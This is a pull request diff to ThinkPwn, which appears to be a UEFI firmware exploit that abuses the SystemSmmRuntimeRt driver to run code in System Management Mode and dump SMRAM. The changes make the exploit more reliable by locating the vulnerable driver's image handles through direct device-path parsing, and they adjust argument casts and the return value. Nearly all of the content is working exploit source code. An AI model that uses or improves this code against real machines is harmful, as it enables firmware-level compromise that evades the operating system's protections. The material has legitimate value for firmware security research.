### PR TITLE
Use DevicePath directly

### DIFF
--- a/ThinkPwn.inf
+++ b/ThinkPwn.inf
@@ -30,6 +30,7 @@
 [Protocols]
   gEfiSmmBaseProtocolGuid
   gEfiSmmAccessProtocolGuid
+  gEfiSmmAccess2ProtocolGuid
   gEfiLoadedImageProtocolGuid
   gEfiSimpleFileSystemProtocolGuid
   

--- a/src/ThinkPwn.c
+++ b/src/ThinkPwn.c
@@ -82,7 +82,7 @@ VOID SmmHandler(VOID *Context, VOID *Unknown, VOID *Data)
     }
 }
 //--------------------------------------------------------------------------------------
-EFI_STATUS GetImageHandle(CHAR16 *TargetPath, EFI_HANDLE *HandlesList, UINTN *HandlesListLength)
+EFI_STATUS GetImageHandle(IN EFI_GUID *Name, EFI_HANDLE *HandlesList, UINTN *HandlesListLength)
 {
     EFI_STATUS Status;
     EFI_HANDLE *Buffer = NULL;
@@ -140,7 +140,7 @@ EFI_STATUS GetImageHandle(CHAR16 *TargetPath, EFI_HANDLE *HandlesList, UINTN *Ha
                         MEDIA_FW_VOL_FILEPATH_DEVICE_PATH *Path = (MEDIA_FW_VOL_FILEPATH_DEVICE_PATH *)DevicePath;
 
                         // Compare image GUID
-                        if (!memcmp (&Path->FvFileName, &mImageName, sizeof (EFI_GUID))) {
+                        if (!memcmp (&Path->FvFileName, Name, sizeof (EFI_GUID))) {
 
                             if (HandlesFound + 1 < *HandlesListLength)
                             {
@@ -295,7 +295,7 @@ EFI_STATUS SystemSmmRuntimeRt_Exploit(EXPLOIT_HANDLER Handler)
     }
 
     printf("Buffer for SMM communicate call is allocated at 0x%llx\n", Data);    
-    printf("Obtaining %S image handles...\n", IMAGE_NAME);
+    //printf("Obtaining %g image handles...\n", &mImageName);
 
     /*
         Obtain image handle, SystemSmmRuntimeRt UEFI driver registers sub_A54() as 
@@ -303,7 +303,7 @@ EFI_STATUS SystemSmmRuntimeRt_Exploit(EXPLOIT_HANDLER Handler)
         We can determinate this handle value using LocateHandle() function of
         EFI_BOOT_SERVICES.
     */
-    if (GetImageHandle(IMAGE_NAME, HandlesList, &HandlesListLength) == EFI_SUCCESS)
+    if (GetImageHandle(&mImageName, HandlesList, &HandlesListLength) == EFI_SUCCESS)
     {
         if (HandlesListLength > 0)
         {

--- a/src/ThinkPwn.c
+++ b/src/ThinkPwn.c
@@ -14,6 +14,7 @@
 #include <Library/UefiBootServicesTableLib.h>
 #include <Library/ShellLib.h>
 #include <Library/ShellCEntryLib.h>
+#include <Library/DevicePathLib.h>
 
 #include <Protocol/SmmBase.h>
 #include <Protocol/SmmAccess.h>
@@ -25,7 +26,7 @@
 #include "hexdump.h"
 
 // image name for SystemSmmRuntimeRt UEFI driver
-#define IMAGE_NAME L"FvFile(7C79AC8C-5E6C-4E3D-BA6F-C260EE7C172E)"
+STATIC EFI_GUID mImageName = {0x7C79AC8C, 0x5E6C, 0x4E3D, 0xBA, 0x6F, 0xC2, 0x60, 0xEE, 0x7C, 0x17, 0x2E};
 
 // SMM communication data size
 #define BUFF_SIZE 0x1000
@@ -83,11 +84,15 @@ VOID SmmHandler(VOID *Context, VOID *Unknown, VOID *Data)
 //--------------------------------------------------------------------------------------
 EFI_STATUS GetImageHandle(CHAR16 *TargetPath, EFI_HANDLE *HandlesList, UINTN *HandlesListLength)
 {
+    EFI_STATUS Status;
     EFI_HANDLE *Buffer = NULL;
-    UINTN BufferSize = 0, HandlesFound = 0, i = 0;    
+    UINTN BufferSize = 0, HandlesFound = 0, i = 0;
+    EFI_LOADED_IMAGE *LoadedImage = NULL;
+    EFI_DEVICE_PATH_PROTOCOL              *DevicePath;
+    EFI_DEVICE_PATH_PROTOCOL              *PrevDevicePath;
 
     // determinate handles buffer size
-    EFI_STATUS Status = gBS->LocateHandle(
+    Status = gBS->LocateHandle(
         ByProtocol,
         &gEfiLoadedImageProtocolGuid,
         NULL,
@@ -119,39 +124,52 @@ EFI_STATUS GetImageHandle(CHAR16 *TargetPath, EFI_HANDLE *HandlesList, UINTN *Ha
     {
         for (i = 0; i < BufferSize / sizeof(EFI_HANDLE); i += 1)
         {
-            EFI_LOADED_IMAGE *LoadedImage = NULL;
-
             // get loaded image protocol instance for given image handle
             if (gBS->HandleProtocol(
                 Buffer[i],
                 &gEfiLoadedImageProtocolGuid, 
-                (VOID *)&LoadedImage) == EFI_SUCCESS)
+                (VOID **)&LoadedImage) == EFI_SUCCESS)
             {
                 // get and check image path
-                CHAR16 *Path = ConvertDevicePathToText(LoadedImage->FilePath, TRUE, TRUE);
-                if (Path)
-                {                            
-                    if (!wcscmp(Path, TargetPath))
-                    {
-                        if (HandlesFound + 1 < *HandlesListLength)
-                        {
-                            // image handle was found
-                            HandlesList[HandlesFound] = Buffer[i];
-                            HandlesFound += 1;                        
-                        }
-                        else
-                        {
-                            // handles list is full
-                            Status = EFI_BUFFER_TOO_SMALL;
+                DevicePath = LoadedImage->FilePath;
+                PrevDevicePath = DevicePath;
+
+                while (DevicePath && !IsDevicePathEnd (DevicePath)) {
+                    if ((DevicePathType(DevicePath) == MEDIA_DEVICE_PATH) && 
+                        (DevicePathSubType(DevicePath) == MEDIA_PIWG_FW_FILE_DP)) {
+                        MEDIA_FW_VOL_FILEPATH_DEVICE_PATH *Path = (MEDIA_FW_VOL_FILEPATH_DEVICE_PATH *)DevicePath;
+
+                        // Compare image GUID
+                        if (!memcmp (&Path->FvFileName, &mImageName, sizeof (EFI_GUID))) {
+
+                            if (HandlesFound + 1 < *HandlesListLength)
+                            {
+                                // image handle was found
+                                HandlesList[HandlesFound] = Buffer[i];
+                                HandlesFound += 1;                        
+                            }
+                            else
+                            {
+                                // handles list is full
+                                Status = EFI_BUFFER_TOO_SMALL;
+                                break;
+                            }
                         }
                     }
 
-                    gBS->FreePool(Path);                                        
-
-                    if (Status != EFI_SUCCESS)
-                    {
+                    // Advance to next DevicePath node
+                    DevicePath = NextDevicePathNode (DevicePath);
+                    
+                    // If it didn't work (e.g. broken node, length = 0, ...), break
+                    if (DevicePath == PrevDevicePath) {
                         break;
                     }
+                    PrevDevicePath = DevicePath;
+                }
+                
+                if (Status != EFI_SUCCESS)
+                {
+                    break;
                 }
             }
         }
@@ -386,7 +404,7 @@ EFI_STATUS WriteFile(EFI_HANDLE ImageHandle, char *FilePath, VOID *Data, UINTN *
 //--------------------------------------------------------------------------------------
 int main(int Argc, char **Argv)
 {
-    int Ret = -1;
+    int Ret = 0; // -1 immediately exits from EFI shell, can't see output of program
     char *lpszOutPath = NULL;
     EFI_STATUS Status = EFI_SUCCESS;    
     EFI_SMM_ACCESS_PROTOCOL *SmmAccess = NULL;  
@@ -396,7 +414,7 @@ int main(int Argc, char **Argv)
 
     if (Argc >= 2)
     {
-        if ((g_DumpAddr = (VOID *)strtoull(Argv[1], NULL, 16)) == 0 && errno == EINVAL)
+        if ((g_DumpAddr = (VOID *)(UINTN)strtoull(Argv[1], NULL, 16)) == 0 && errno == EINVAL)
         {
             printf("strtoull() ERROR %d\n", errno);
             return errno;
@@ -404,7 +422,7 @@ int main(int Argc, char **Argv)
 
         if (Argc >= 3)
         {
-            if ((g_DumpSize = strtoull(Argv[2], NULL, 16)) == 0 && errno == EINVAL)
+            if ((g_DumpSize = (UINTN)strtoull(Argv[2], NULL, 16)) == 0 && errno == EINVAL)
             {
                 printf("strtoull() ERROR %d\n", errno);
                 return errno;


### PR DESCRIPTION
Use DevicePath directly and avoid using ConvertDevicePathToText. If a
DevicePath node is broken (seen on some machines),
ConvertDevicePathToText loops endlessly because the Length of a Node is
0.
